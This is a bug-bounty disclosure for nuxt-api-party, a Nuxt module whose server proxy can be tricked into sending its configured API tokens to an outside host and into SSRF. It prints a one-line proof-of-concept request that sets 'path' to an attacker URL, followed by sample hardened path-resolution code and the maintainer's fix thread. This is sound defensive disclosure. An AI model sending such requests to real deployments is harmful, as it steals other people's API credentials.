Leak Secret tokens by changing baseURL in johannschopplich/nuxt-api-party

Valid

Reported on

Jun 15th 2023


Description

nuxt-api-party lets developers hook up external APIs to a Nuxt app. You can configure API base URLs and credentials that the server-side proxy attaches to outgoing requests.

It is suggested in the documentation that this plugin is capable of handling sensitive data.

There is a design flaw that could allow an attacker to extract private API keys.

Proof of Concept

Send a request to /api/__api_party/yourendpoint with the body:

{
   "path": "https://attacker.com"
}

Sensitive data will be leaked to the attacker site.

This is also possible by using the runtime endpoint change feature.

SSRF is also possible, which could have further impact.
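As an added example (not code from nuxt-api-party or its fix), the snippet below shows the unsafe resolution of a client-supplied `path` next to a hardened version that keeps the credential-bearing proxy request on the configured base URL; the endpoint name, URLs and token are placeholders.

```javascript
// Hypothetical server-side endpoint configuration; the token is a placeholder.
const endpoints = {
  yourendpoint: {
    url: 'https://api.example.com/v1/',
    token: 'SECRET_TOKEN_PLACEHOLDER',
  },
};

// The pattern behind the report: an absolute `path` wins over baseURL, so the
// proxy (and the Authorization header it adds) is sent to whatever origin the
// client names.
function resolveUnsafe(baseURL, path) {
  return new URL(path, baseURL).toString();
}

// Hardened: treat `path` strictly as a path relative to baseURL.
function resolveSafe(baseURL, path) {
  if (typeof path !== 'string') throw new Error('path must be a string');
  // Reject scheme-prefixed ("https://", "http://", ...) and protocol-relative
  // ("//host") forms before any URL parsing happens.
  if (/^[a-z][a-z0-9+.-]*:/i.test(path) || path.startsWith('//')) {
    throw new Error('absolute URLs are not allowed in path');
  }
  // Normalise the base so relative resolution stays inside its path prefix.
  const base = new URL(baseURL.endsWith('/') ? baseURL : `${baseURL}/`);
  const target = new URL(path.replace(/^\/+/, ''), base);
  // Defence in depth: WHATWG parsing turns "\\host" into "//host", and "../"
  // segments can climb out of the prefix, so check origin and path prefix
  // on the resolved result rather than trusting the regex alone.
  if (target.origin !== base.origin) {
    throw new Error('resolved URL leaves the configured origin');
  }
  if (!target.pathname.startsWith(base.pathname)) {
    throw new Error('resolved URL leaves the configured path prefix');
  }
  return target.toString();
}

// What the proxy handler would send upstream for a given endpoint and path.
function buildProxyRequest(endpointName, path) {
  const endpoint = endpoints[endpointName];
  if (!endpoint) throw new Error(`unknown endpoint ${endpointName}`);
  return {
    url: resolveSafe(endpoint.url, path),
    headers: { Authorization: `Bearer ${endpoint.token}` },
  };
}
```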

Impact

Leaking secret API keys.

SSRF.

Occurrences

ofetch will permit http:// paths.

We are processing your report and will contact the johannschopplich/nuxt-api-party team within 24 hours. 3 months ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 3 months ago
We have contacted a member of the johannschopplich/nuxt-api-party team and are waiting to hear back 3 months ago
Johann
3 months ago

Maintainer


Hey there! Thank you very much for the security report. I have prepared a fix for both issues. Waiting on the release of the fix by you link it in my documentation. Is this the best way to proceed?

Thanks again, really happy you found this.

OhB00
3 months ago

Researcher


Hey, happy to review any fixes, where can I find them?

Johann Schopplich validated this vulnerability 3 months ago

Hey there, I have created a branch with the fixes: https://github.com/johannschopplich/nuxt-api-party/tree/fix/tokens-leak I want to push a release in the coming days and publish the security issue.

OhB00 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Johann Schopplich marked this as fixed in 0.13.0 with commit 481872 3 months ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
Johann Schopplich published this vulnerability 3 months ago
server.ts#L37 has been validated
Johann Schopplich gave praise 3 months ago
Thank you again for reporting this vulnerability! This was my first vulnerability via a bounty hunting program. I'm glad it exists.
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
OhB00
3 months ago

Researcher


Fix looks good!
